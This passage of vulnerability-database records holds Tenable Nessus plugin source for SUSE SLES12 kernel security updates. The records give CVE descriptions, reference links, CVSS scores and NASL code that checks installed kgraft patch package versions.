value:\"https://www.suse.com/security/cve/CVE-2013-7446/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8019/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8816/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0758/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1583/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2053/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4470/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4565/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162005-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c3803771\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2016-1176=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2016-1176=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_48-52_27-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_48-52_27-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_48-52_27-default-5-2.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_48-52_27-xen-5-2.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:24:30", "description": "This update for the Linux Kernel 3.12.51-52_39 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-4470: The key_reject_and_link function in\n security/keys/key.c in the Linux kernel did not ensure\n that a certain data structure is initialized, which\n allowed local users to cause a denial of service (system\n crash) via vectors involving a crafted keyctl request2\n command (bsc#984764).\n\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (stack memory consumption) via vectors involving crafted\n mmap calls for /proc pathnames, leading to recursive\n pagefault handling (bsc#983144).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relied on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bsc#980883).\n\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in\n the Linux kernel allowed local users to gain privileges\n via crafted ASN.1 data (bsc#980856).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bsc#979064).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-02T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2010-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "modified": "2016-09-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_51-52_39-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_51-52_39-default"], "id": "SUSE_SU-2016-2010-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93280", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2010-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93280);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-7446\", \"CVE-2015-8816\", \"CVE-2016-0758\", \"CVE-2016-1583\", \"CVE-2016-2053\", \"CVE-2016-3134\", \"CVE-2016-4470\", \"CVE-2016-4565\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2010-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.51-52_39 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-4470: The key_reject_and_link function in\n security/keys/key.c in the Linux kernel did not ensure\n that a certain data structure is initialized, which\n allowed local users to cause a denial of service (system\n crash) via vectors involving a crafted keyctl request2\n command (bsc#984764).\n\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (stack memory consumption) via vectors involving crafted\n mmap calls for /proc pathnames, leading to recursive\n pagefault handling (bsc#983144).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relied on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bsc#980883).\n\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in\n the Linux kernel allowed local users to gain privileges\n via crafted ASN.1 data (bsc#980856).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bsc#979064).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=955837\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971793\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980856\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980883\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983144\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=984764\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-7446/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8816/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0758/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1583/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2053/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4470/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4565/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162010-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?efd43c77\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2016-1174=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2016-1174=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_51-52_39-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_51-52_39-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_51-52_39-default-4-2.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_51-52_39-xen-4-2.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:24:30", "description": "This update for the Linux Kernel 3.12.55-52_42 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-4470: The key_reject_and_link function in\n security/keys/key.c in the Linux kernel did not ensure\n that a certain data structure is initialized, which\n allowed local users to cause a denial of service (system\n crash) via vectors involving a crafted keyctl request2\n command (bsc#984764).\n\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (stack memory consumption) via vectors involving crafted\n mmap calls for /proc pathnames, leading to recursive\n pagefault handling (bsc#983144).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relied on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bsc#980883).\n\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in\n the Linux kernel allowed local users to gain privileges\n via crafted ASN.1 data (bsc#980856).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bsc#979064).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-02T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2006-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "modified": "2016-09-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_55-52_42-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_55-52_42-default"], "id": "SUSE_SU-2016-2006-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93278", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2006-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93278);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-7446\", \"CVE-2015-8816\", \"CVE-2016-0758\", \"CVE-2016-1583\", \"CVE-2016-2053\", \"CVE-2016-3134\", \"CVE-2016-4470\", \"CVE-2016-4565\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2006-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.55-52_42 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-4470: The key_reject_and_link function in\n security/keys/key.c in the Linux kernel did not ensure\n that a certain data structure is initialized, which\n allowed local users to cause a denial of service (system\n crash) via vectors involving a crafted keyctl request2\n command (bsc#984764).\n\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (stack memory consumption) via vectors involving crafted\n mmap calls for /proc pathnames, leading to recursive\n pagefault handling (bsc#983144).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relied on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bsc#980883).\n\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in\n the Linux kernel allowed local users to gain privileges\n via crafted ASN.1 data (bsc#980856).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bsc#979064).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=955837\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971793\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980856\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980883\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983144\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=984764\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-7446/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8816/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0758/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1583/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2053/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4470/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4565/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162006-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c0b6693a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2016-1173=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2016-1173=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_55-52_42-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_55-52_42-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", 